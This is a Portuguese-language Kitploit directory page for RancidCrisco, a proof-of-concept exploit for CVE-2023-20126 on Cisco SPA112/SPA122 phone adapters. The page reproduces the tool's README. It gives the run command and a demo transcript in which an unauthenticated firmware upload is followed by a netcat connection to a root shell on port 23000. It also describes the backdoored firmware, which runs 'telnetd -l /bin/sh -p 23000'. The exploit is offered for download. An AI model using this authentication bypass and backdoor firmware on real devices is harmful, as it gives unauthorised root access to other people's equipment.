Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RancidCrisco — Exploit de prova de conceito para CVE-2023-20126 visando adaptadores telefônicos Cisco SPA. Carrega firmware malicioso para obter um shell root na porta 23000/tcp via telnetd. | Kitploit
Ferramentas/GitHubGitHub/fullspectrumdev/rancidcrisco
Segurança de Sistemas EmbarcadosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança de Hardware e IoTRed TeamingFerramenta de Acesso RemotoAnálise de Firmware
GitHubfullspectrumdev/rancidcrisco

RancidCrisco

Exploit de prova de conceito para CVE-2023-20126 visando adaptadores telefônicos Cisco SPA. Carrega firmware malicioso para obter um shell root na porta 23000/tcp via telnetd.

24217há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

RancidCrisco

Mínimo Viável PoC para CVE-2023-20126

Esta é a versão inicial. Funciona, mas é o exploit do 'caso mais simples'.

Testado e funcionando no SPA112/SPA122 - SPA232D requer uma imagem de firmware diferente.

Fornece um root-shell na porta 23000/tcp.

Ainda preciso limpar o toolchain usado para editar o firmware e provavelmente colocarei isso em um repositório diferente. É baseado principalmente no trabalho de @BigNerd95, mas com pequenas alterações para funcionar nos arquivos de firmware SPA112/122.

Demo.

root@kitploit:~
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin 
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.

< wait a few mins, nervously > 

$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????


BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0

Files

  • fwupload.py - carregador de imagem de firmware que contorna a autenticação simplesmente não enviando nenhuma, explorando o CVE-2023-20126. leva dois argumentos: URL da interface Web do dispositivo e arquivo de firmware para carregar.
  • telnet-23000.bin - Imagem de firmware maliciosa de Prova de Conceito que gera telnetd -l /bin/sh -p 23000, fornecendo um root shell na porta 23000/tcp. Baseado no trabalho de bignerd95.

Licence

WTFPL.

Bugs

use o git issue.

Disclaimer

Se isso queimar o seu maldito dispositivo, eu não assumo nenhuma responsabilidade.
Esse é SEU problema.
Quer dizer, eu montei esse firmware com backdoor em uma noite.
Além disso, por que você não está seguindo o tutorial e construindo seu próprio firmware com backdoor?

Baixar ferramenta